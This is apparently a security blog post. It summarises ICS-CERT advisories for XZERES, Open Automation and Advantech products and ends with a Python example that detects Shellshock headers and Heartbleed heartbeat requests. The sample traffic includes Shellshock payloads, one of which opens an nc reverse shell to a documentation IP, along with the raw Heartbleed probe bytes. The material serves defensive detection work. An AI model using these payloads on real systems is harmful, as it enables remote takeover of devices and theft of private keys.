This afternoon the DHS ICS-CERT updated the XZERES advisory published earlier this week. It also published control system advisories for products from Open Automation and Advantech.
This update revises the description of the potential impact of the vulnerability. Originally it said that: “Successful exploitation of this vulnerability allows the ID to be retrieved from the browser and will allow the default ID to be changed.” Now it reads: “Successful exploitation of this vulnerability could allow the injection of malicious script.” That is a significant change in impact.
The description of the cross-site scripting vulnerability has also been changed. Originally it said: “The 442SR OS recognizes both the POST and GET methods for data input. By using the GET method, an attacker may retrieve the ID from the browser and will allow the default user ID to be changed. The default user has admin rights to the entire system.” It now reads: “The 442SR OS does not provide adequate input validation. This could allow malicious script to be injected into the program.” The CVSS v3 base score remains 9.8.
NOTE: This update does appear on the ICS-CERT landing page, but only because the original listing is still there and the change was made in place to that listing. I still recommend following @ICSCERT on Twitter to get notified of these updates.
Open Automation Advisory
This advisory describes an uncontrolled search path element vulnerability in the Open Automation Software OPC Systems.NET application. The vulnerability was reported by Ivan Sanchez from Nullcode Team. ICS-CERT reports that Open Automation Software does not intend to patch the vulnerability at this time.
ICS-CERT reports that a social engineering attack is required to exploit this DLL hijacking vulnerability: an uncontrolled search path means the application loads a library by name from a location the attacker can influence, so the attacker has to get a malicious DLL of that name into place and then get a user to trigger the load. A successful exploit would run the attacker's code at the same privilege level as the application.
ICS-CERT reports that: “Open Automation Software has passed the researcher information to its support team to assist customers in the event that they encounter this vulnerability.”
Advantech Advisory
This advisory describes three vulnerabilities in the Advantech EKI-132x platform devices. This was an uncoordinated disclosure made by Tod Beardsley of Rapid7. Advantech plans to release updated firmware to fix these vulnerabilities by the end of this month.
The three vulnerabilities are:
• OS command injection (Shellshock) - CVE-2014-6271;
• Improper restriction of operations within the bounds of a memory buffer (Heartbleed) - CVE-2014-0160; and
• Improper restriction of operations within the bounds of a memory buffer - CVE-2012-2152.
ICS-CERT reports that a relatively unskilled attacker could remotely exploit these vulnerabilities using publicly available exploit code to execute arbitrary code, to obtain private keys, or to impersonate the authenticated user and perform a man-in-the-middle attack.
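As an added example (not code from the advisory, ICS-CERT, Rapid7 or Advantech), the Python below shows the two detection checks a defender would put in front of devices like these: a scan of HTTP header values for the `() {` function-definition prefix that vulnerable bash mis-parsed (Shellshock, CVE-2014-6271, reached remotely through CGI environment variables), and the heartbeat bounds check that Heartbleed-vulnerable OpenSSL omitted (CVE-2014-0160). The HTTP request and TLS records are constructed for the example; the 8-byte probe record is the structure used by the widely circulated public Heartbleed test scripts.

```python
"""Detection logic for Shellshock payloads in HTTP headers and Heartbleed
heartbeat requests. Added example; the sample request and TLS records
below are constructed, not captured from any Advantech device."""
import re
import struct
from typing import List

# Shellshock: bash treated environment variables beginning with "() {" as
# function definitions and executed whatever followed the closing brace.
# CGI servers copied HTTP headers into such variables, so the tell-tale
# on the wire is "() {" inside a header value.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def find_shellshock_headers(raw_request: str) -> List[str]:
    """Return the names of HTTP headers whose values carry the Shellshock
    function-definition prefix."""
    hits = []
    for line in raw_request.splitlines()[1:]:  # skip the request line
        if not line.strip():
            break  # blank line ends the header block
        name, sep, value = line.partition(":")
        if sep and SHELLSHOCK_RE.search(value):
            hits.append(name.strip())
    return hits


TLS_HEARTBEAT = 0x18   # TLS record content type for heartbeat (RFC 6520)
HB_REQUEST = 0x01      # HeartbeatMessageType heartbeat_request
HB_MIN_PADDING = 16    # RFC 6520 requires at least 16 bytes of padding


def is_heartbleed_request(record: bytes) -> bool:
    """True if a TLS heartbeat request claims more payload than the record
    carries. This is the bounds check the OpenSSL fix added: a request is
    rejected when 1 + 2 + payload_length + 16 exceeds the record length."""
    if len(record) < 5:
        return False
    content_type, _version, rec_len = struct.unpack("!BHH", record[:5])
    if content_type != TLS_HEARTBEAT:
        return False
    body = record[5:5 + rec_len]
    if len(body) < 3:
        return False  # too short to carry even type + payload_length
    hb_type, payload_len = struct.unpack("!BH", body[:3])
    if hb_type != HB_REQUEST:
        return False
    return 1 + 2 + payload_len + HB_MIN_PADDING > rec_len


def build_heartbeat_request(payload: bytes, claimed_len: int) -> bytes:
    """Build a TLS 1.1 heartbeat request record. claimed_len is written into
    the payload_length field so it can deliberately disagree with payload."""
    body = struct.pack("!BH", HB_REQUEST, claimed_len) + payload + b"\x00" * HB_MIN_PADDING
    return struct.pack("!BHH", TLS_HEARTBEAT, 0x0302, len(body)) + body


# Constructed sample traffic (RFC 5737 documentation addresses).
BENIGN_REQUEST = (
    "GET /cgi-bin/status.cgi HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)
SHELLSHOCK_REQUEST = (
    "GET /cgi-bin/status.cgi HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "User-Agent: () { :;}; /bin/bash -c 'id'\r\n"
    "Cookie: () { :; }; /usr/bin/nc -e /bin/sh 192.0.2.99 4444\r\n"
    "\r\n"
)
BENIGN_HEARTBEAT = build_heartbeat_request(b"ping", 4)
# Record layout used by the public Heartbleed probe: declared payload
# length 0x4000 (16384 bytes) with no payload bytes actually sent.
HEARTBLEED_PROBE = bytes.fromhex("18 03 02 00 03 01 40 00")

if __name__ == "__main__":
    print("benign HTTP hits:", find_shellshock_headers(BENIGN_REQUEST))
    print("Shellshock HTTP hits:", find_shellshock_headers(SHELLSHOCK_REQUEST))
    print("benign heartbeat flagged:", is_heartbleed_request(BENIGN_HEARTBEAT))
    print("probe flagged:", is_heartbleed_request(HEARTBLEED_PROBE))
```

Both checks are passive and stateless, which is why equivalent rules were deployable in network IDS signatures within days of each disclosure; on a device whose firmware cannot yet be updated, the same logic placed on a monitoring span port in front of the EKI units is the practical compensating control until Advantech's fix ships.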